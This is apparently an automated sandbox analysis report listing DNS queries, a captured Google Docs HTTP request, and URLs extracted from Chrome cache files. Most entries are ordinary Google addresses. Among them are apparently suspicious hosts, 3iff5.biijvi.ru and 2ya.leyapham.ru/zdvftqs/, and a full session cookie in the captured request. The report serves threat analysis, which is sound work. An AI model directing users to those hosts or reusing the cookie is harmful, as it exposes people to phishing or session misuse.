              Source: global trafficDNS traffic detected: DNS query: 3iff5.biijvi.ru
              Source: global trafficDNS traffic detected: DNS query: contacts.google.com
              Source: unknownHTTP traffic detected: POST /document/font/getmetadata?includes_info_params=true&usp=sharing_eip&cros_files=false HTTP/1.1Host: docs.google.comConnection: keep-aliveContent-Length: 246X-Build: editors.documents-frontend_20250225.02_p2sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Same-Domain: 1sec-ch-ua-arch: "x86"sec-ch-ua-platform-version: "10.0.0"X-Rel-Id: 2b2.340d1f33.ssec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"X-Client-Deadline-Ms: 20000sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8sec-ch-ua-full-version: "117.0.5938.132"Accept: */*Origin: https://docs.google.comX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?tab=t.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=522=ewGe8FTUIcMmxKRLAZj-NK7Af2_Hju05pkmf4oUs20yDDw4jmj0rlQDj0xnuPimJCpzoBFSg6CI1DBAtWmQZWwG6x2v9571QVxc0Hej3RuxEtow0BxhMM6sKK_FpS7zCeZW6uuwHvKaP0Llq6NsLBhWOxQx-bERWXkf-VZYX12I8dWpXrpwsPqZlaIdJrAhz; lbcs=0
              Source: chromecache_375.2.dr, chromecache_395.2.drString found in binary or memory: http://csi.gstatic.com/csi
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: http://localhost.corp.google.com/inapp/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: http://localhost.proxy.googlers.com/inapp/
              Source: chromecache_248.2.drString found in binary or memory: http://support.google.com/docs?p=labs-help
              Source: chromecache_248.2.drString found in binary or memory: http://support.google.com/docs?p=labs-privacy
              Source: chromecache_323.2.drString found in binary or memory: http://support.google.com/drive/?hl=en&p=anonymous_users
              Source: chromecache_323.2.drString found in binary or memory: http://support.google.com/drive/?p=restore_trash_collab
              Source: chromecache_248.2.dr, chromecache_361.2.dr, chromecache_255.2.dr, chromecache_423.2.dr, chromecache_306.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: chromecache_425.2.drString found in binary or memory: https://2ya.leyapham.ru/zdvftqs/
              Source: chromecache_248.2.drString found in binary or memory: https://accountlinking-pa.clients6.google.com
              Source: chromecache_248.2.drString found in binary or memory: https://accountlinking-pa.googleapis.com
              Source: chromecache_323.2.drString found in binary or memory: https://accounts.google.com/ServiceLogin
              Source: chromecache_375.2.dr, chromecache_395.2.drString found in binary or memory: https://accounts.google.com/gsi/ottoken
              Source: chromecache_375.2.dr, chromecache_395.2.drString found in binary or memory: https://accounts.google.com/o/fedcm/config.json
              Source: chromecache_375.2.dr, chromecache_282.2.dr, chromecache_219.2.dr, chromecache_330.2.dr, chromecache_351.2.dr, chromecache_395.2.dr, chromecache_340.2.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
              Source: chromecache_375.2.dr, chromecache_330.2.dr, chromecache_395.2.drString found in binary or memory: https://accounts.google.com/o/oauth2/iframe
              Source: chromecache_282.2.dr, chromecache_219.2.dr, chromecache_330.2.dr, chromecache_351.2.dr, chromecache_340.2.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
              Source: chromecache_323.2.drString found in binary or memory: https://angular.dev/license
              Source: chromecache_330.2.dr, chromecache_351.2.dr, chromecache_221.2.dr, chromecache_340.2.dr, chromecache_403.2.drString found in binary or memory: https://apis.google.com
              Source: chromecache_330.2.dr, chromecache_246.2.drString found in binary or memory: https://apis.google.com/js/api.js
              Source: chromecache_323.2.dr, chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://apis.google.com/js/client.js
              Source: chromecache_248.2.drString found in binary or memory: https://apis.google.com/js/client.js?jsmode=DU
              Source: chromecache_323.2.drString found in binary or memory: https://apps-drive-picker-dev.corp.google.com/picker/minpick/main
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-frontend-autopush.corp.google.co.uk/inapp/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-frontend-autopush.corp.google.co.uk/tools/feedback/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-frontend-autopush.corp.google.com/inapp/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-frontend-autopush.corp.google.com/tools/feedback/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-frontend-autopush.corp.google.de/inapp/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-frontend-autopush.corp.google.de/tools/feedback/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-frontend-autopush.corp.youtube.com/inapp/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-frontend-autopush.corp.youtube.com/tools/feedback/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-frontend-staging.corp.google.com/inapp/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-frontend-staging.corp.google.com/tools/feedback/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-help-frontend-autopush.corp.youtube.com/inapp/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://asx-help-frontend-autopush.corp.youtube.com/tools/feedback/
              Source: chromecache_248.2.drString found in binary or memory: https://calendar.google.com/calendar
              Source: chromecache_248.2.drString found in binary or memory: https://calendar.google.com/calendar/:authuser/companion
              Source: chromecache_248.2.drString found in binary or memory: https://calendar.google.com/calendar/:authuser/companionedit
              Source: chromecache_248.2.drString found in binary or memory: https://calendar.google.com/calendar/r
              Source: chromecache_323.2.drString found in binary or memory: https://calendar.google.com/calendar/r/day/
              Source: chromecache_323.2.drString found in binary or memory: https://calendar.google.com/calendar/r/eventedit
              Source: chromecache_323.2.drString found in binary or memory: https://calendar.google.com/calendar/r?eid=
              Source: chromecache_323.2.drString found in binary or memory: https://calendar.google.com/calendar/u/
              Source: chromecache_443.2.dr, chromecache_287.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
              Source: chromecache_248.2.drString found in binary or memory: https://chat.google.com/room/
              Source: chromecache_443.2.dr, chromecache_287.2.drString found in binary or memory: https://chrome.google.com/webstore/detail/
              Source: chromecache_330.2.drString found in binary or memory: https://classroom.google.com/sharewidget?usegapi=1
              Source: chromecache_330.2.drString found in binary or memory: https://clients3.google.com/cast/chromecast/home/widget/backdrop?usegapi=1
              Source: chromecache_375.2.dr, chromecache_323.2.dr, chromecache_282.2.dr, chromecache_219.2.dr, chromecache_330.2.dr, chromecache_351.2.dr, chromecache_395.2.dr, chromecache_340.2.drString found in binary or memory: https://clients6.google.com
              Source: chromecache_248.2.drString found in binary or memory: https://cloudsearch.googleapis.com/v1/query/search
              Source: chromecache_375.2.dr, chromecache_395.2.drString found in binary or memory: https://console.developers.google.com/
              Source: chromecache_223.2.dr, chromecache_345.2.dr, chromecache_361.2.dr, chromecache_255.2.drString found in binary or memory: https://contacts.google.com/widget/companion
              Source: chromecache_323.2.drString found in binary or memory: https://content-googleapis-staging.sandbox.google.com
              Source: chromecache_323.2.drString found in binary or memory: https://content-googleapis-test.sandbox.google.com
              Source: chromecache_375.2.dr, chromecache_282.2.dr, chromecache_219.2.dr, chromecache_330.2.dr, chromecache_351.2.dr, chromecache_395.2.dr, chromecache_340.2.drString found in binary or memory: https://content.googleapis.com
              Source: chromecache_375.2.dr, chromecache_395.2.drString found in binary or memory: https://csi.gstatic.com/csi
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://daily-5.meet.google.com
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://daily-6.meet.google.com
              Source: chromecache_330.2.drString found in binary or memory: https://dataconnector.corp.google.com/:session_prefix:ui/widgetview?usegapi=1
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://dev-workspaceui-pa-googleapis.corp.google.com
              Source: chromecache_375.2.dr, chromecache_395.2.drString found in binary or memory: https://developers.google.com/
              Source: chromecache_375.2.dr, chromecache_395.2.drString found in binary or memory: https://developers.google.com/api-client-library/javascript/reference/referencedocs
              Source: chromecache_375.2.dr, chromecache_395.2.drString found in binary or memory: https://developers.google.com/identity/gsi/web/guides/gis-migration)
              Source: chromecache_375.2.dr, chromecache_395.2.drString found in binary or memory: https://developers.googleblog.com/2018/03/discontinuing-support-for-json-rpc-and.html
              Source: chromecache_323.2.drString found in binary or memory: https://docs-qa.corp.google.com
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://docs.google.com
              Source: chromecache_248.2.drString found in binary or memory: https://docs.google.com/document/d/1SzAxs6HDSH1zNGEVCmGwZQR1cxdQI8-33mpYgl6Q1jE/r/0-5tmxJv1j5g5hY7dg
              Source: chromecache_248.2.drString found in binary or memory: https://docs.google.com/document/d/1kganm9BHI3TsF8ogVulX2o4DzzO8XA4gu8aIKneTTNU/preview
              Source: chromecache_323.2.drString found in binary or memory: https://docs.google.com/picker
              Source: chromecache_248.2.drString found in binary or memory: https://docs.google.com/requestreview?id=
              Source: chromecache_248.2.drString found in binary or memory: https://docs.google.com/support/bin/answer.py?hl=
              Source: chromecache_282.2.dr, chromecache_219.2.dr, chromecache_351.2.dr, chromecache_340.2.drString found in binary or memory: https://domains.google.com/suggest/flow
              Source: chromecache_248.2.drString found in binary or memory: https://drawings.google.com
              Source: chromecache_323.2.drString found in binary or memory: https://drive-thirdparty.googleusercontent.com/
              Source: chromecache_323.2.drString found in binary or memory: https://drive.google.com
              Source: chromecache_248.2.drString found in binary or memory: https://drive.google.com/drive/my-drive
              Source: chromecache_323.2.drString found in binary or memory: https://drive.google.com/open?id=
              Source: chromecache_323.2.drString found in binary or memory: https://drive.google.com/picker/minpick/main
              Source: chromecache_330.2.drString found in binary or memory: https://drive.google.com/savetodrivebutton?usegapi=1
              Source: chromecache_323.2.drString found in binary or memory: https://drive.sandbox.google.com
              Source: chromecache_330.2.drString found in binary or memory: https://families.google.com/webcreation?usegapi=1&usegapi=1
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://feedback.googleusercontent.com/resources/annotator.css
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://feedback.googleusercontent.com/resources/render_frame2.html
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/design-spec/o/projects%2Fworkspace-design-system%2Fimage
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://fonts.googleapis.com
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://fonts.gstatic.com
              Source: chromecache_248.2.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/add_to_drive/v16/white-24dp/1x/gm_add_to_drive_whi
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/exit_to_app/v13/24px.svg
              Source: chromecache_248.2.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/file_download/v9/white-24dp/1x/gm_file_download_wh
              Source: chromecache_248.2.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/person/v5/gm_grey-24dp/2x/gm_person_gm_grey_24dp.p
              Source: chromecache_323.2.drString found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/maps/v7/web-64dp/logo_maps_color_2x_web_64dp.png
              Source: chromecache_387.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2)
              Source: chromecache_387.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2)
              Source: chromecache_387.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2)
              Source: chromecache_387.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2)
              Source: chromecache_387.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v29/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2)
              Source: chromecache_248.2.drString found in binary or memory: https://forms.gle/UPhmo8AHDibn457p8
              Source: chromecache_248.2.drString found in binary or memory: https://gemini.google.com/gems/create
              Source: chromecache_248.2.drString found in binary or memory: https://github.com/deanm/omggif
              Source: chromecache_248.2.drString found in binary or memory: https://google.com
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://help.youtube.com/tools/feedback/
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://inputtools.google.com
              Source: chromecache_248.2.drString found in binary or memory: https://itunes.apple.com/app/apple-store/id842842640?pt=9008&ct=docs_mo&mt=8
              Source: chromecache_248.2.drString found in binary or memory: https://jmt17.google.com/log
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://localhost.corp.google.com/inapp/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://localhost.proxy.googlers.com/inapp/
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://mail.google.com
              Source: chromecache_248.2.drString found in binary or memory: https://meet-dev.corp.google.com
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://meet.google.com
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://myaccount-autopush.corp.google.com
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://myaccount-dev.corp.google.com
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://myaccount-staging.corp.google.com
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://myaccount.google.com
              Source: chromecache_248.2.drString found in binary or memory: https://mygoogle.corp.google.com/help/answer/9011840
              Source: chromecache_248.2.drString found in binary or memory: https://oauth-redirect-sandbox.googleusercontent.com
              Source: chromecache_248.2.drString found in binary or memory: https://oauth-redirect-test.googleusercontent.com
              Source: chromecache_248.2.drString found in binary or memory: https://oauth-redirect.googleusercontent.com
              Source: chromecache_248.2.drString found in binary or memory: https://one.google.com/plans
              Source: chromecache_248.2.drString found in binary or memory: https://one.google.com/storage
              Source: chromecache_248.2.drString found in binary or memory: https://one.google.com/storage/management
              Source: chromecache_323.2.drString found in binary or memory: https://onepick-autopush.sandbox.google.com/picker/minpick/main
              Source: chromecache_323.2.drString found in binary or memory: https://onepick-preprod.sandbox.google.com/picker/minpick/main
              Source: chromecache_323.2.drString found in binary or memory: https://onepick-staging-drivequal.sandbox.google.com/picker/minpick/main
              Source: chromecache_323.2.drString found in binary or memory: https://onepick-staging.sandbox.google.com/picker/minpick/main
              Source: chromecache_330.2.drString found in binary or memory: https://pay.google.com/gp/v/widget/save
              Source: chromecache_323.2.dr, chromecache_416.2.dr, chromecache_431.2.drString found in binary or memory: https://play.google.com
              Source: chromecache_323.2.dr, chromecache_361.2.dr, chromecache_221.2.dr, chromecache_403.2.dr, chromecache_255.2.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: chromecache_248.2.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.google.android.apps.docs.editors.docs&referrer=utm
              Source: chromecache_330.2.drString found in binary or memory: https://play.google.com/work/embedded/search?usegapi=1&usegapi=1
              Source: chromecache_351.2.dr, chromecache_340.2.drString found in binary or memory: https://plus.google.com
              Source: chromecache_282.2.dr, chromecache_219.2.dr, chromecache_330.2.dr, chromecache_351.2.dr, chromecache_340.2.drString found in binary or memory: https://plus.googleapis.com
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://policies.google.com/privacy
              Source: chromecache_248.2.drString found in binary or memory: https://policies.google.com/privacy?hl=en
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://policies.google.com/terms
              Source: chromecache_248.2.drString found in binary or memory: https://policies.google.com/terms?hl=en
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://preprod.meet.google.com
              Source: chromecache_248.2.drString found in binary or memory: https://punctual-dev.corp.google.com
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://sandbox.google.com/inapp/
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://sandbox.google.com/inapp/%
              Source: chromecache_359.2.dr, chromecache_374.2.drString found in binary or memory: https://sandbox.google.com/tools/feedback/
              Source: chromecache_248.2.drString found in binary or memory: https://sheets.google.com
              Source: chromecache_248.2.drString found in binary or memory: https://signaler-pa.clients6.google.com
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://signaler-pa.googleapis.com
              Source: chromecache_248.2.drString found in binary or memory: https://signaler-pa.youtube.com
              Source: chromecache_248.2.drString found in binary or memory: https://signaler-staging.sandbox.google.com
              Source: chromecache_248.2.drString found in binary or memory: https://slides.google.com
              Source: chromecache_323.2.drString found in binary or memory: https://ssl.gstatic.com/docs/approvals/images/approvals_reset.png
              Source: chromecache_289.2.dr, chromecache_338.2.drString found in binary or memory: https://ssl.gstatic.com/docs/common/cleardot.gif
              Source: chromecache_323.2.drString found in binary or memory: https://ssl.gstatic.com/docs/doclist/images/icon_10_generic_list.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/01_supplies.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/02_thoughtbubble.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/03_vector_office.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/04_linegraph.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/05_chalkboard_arrow.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/06_postit.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/07_bargraph.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/08_longexposure.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/09_dreamaesthetic.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/10_rocket.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/11_clouds.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/12_mountains.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/13_jungle.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/14_mountain_reflection.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/15_leaves.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/16_marble.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/17_3Dshapes.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/18_cellophane.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/19_3Dtexture.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/20_poppies.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/21_craft_commuting.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/22_isometric_wfh.jpg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/23_woman_at_desk.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/24_artist.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/25_celebration.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-gen-ai/26_cyclist.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-placeholders/placeholder-01-star-cluster.j
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-placeholders/placeholder-02-wooden-curves.
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-placeholders/placeholder-03-brushwork-moun
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/cover-image-placeholders/placeholder-04-painted-forest
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/docs-ai-image-promo.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/docs-ai-summary-bb-promo.svg
              Source: chromecache_248.2.dr, chromecache_306.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/docs_gemini_ai.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/docs_gemini_promo.gif
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-animated-pageless-promo.gif
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-cover-image-alt-text-sidebar-empty-view.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-cover-image-magic-bar-preview-english.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-cover-image-magic-bar-preview-i18n.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-cover-image-promo.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-docgen-preset-launch-plan.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-docgen-preset-meeting-notes-2.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-docgen-preset-newsletter-2.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-docgen-preset-onboarding.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-docgen-preset-planner.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-docgen-preset-project-roadmp.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/documents/images/kix-docgen-splash.png
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/no_style.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_1.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_10.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_11.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_12.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_13.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_14.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_15.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_2.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_5.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_6.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_8.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/palm_tree_9.svg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-abstract-triangle.
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-boat-sea.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-bouquet-flowers.jp
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-butterfly-dress.jp
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-cactus-concrete.jp
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-cat-astronaut.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-cherry-blossoms.jp
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-cherry-pie.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-coffee-and-vase.jp
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-colorful-lightbulb
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-cosmic-galaxy.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-cotton-candy-candl
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-crocheted-corgi.jp
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-cube-sundae.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-duck-boots.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-einstein-water.jpe
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-empire-state.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-factory-smoke.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-fantasy-castle.jpe
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-fjord-landscape.jp
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-gnomes.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-island.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-ivy-archway.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-jellyfish-painting
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-kitchen-design.jpe
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-light-on-tree.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-light-window.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-lily-plasma.jpeg
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-marketplace-fruit.
              Source: chromecache_248.2.drString found in binary or memory: https://ssl.gstatic.com/docs/presentations/images/slides-image-gen-gallery/202307-motorbike.jpeg
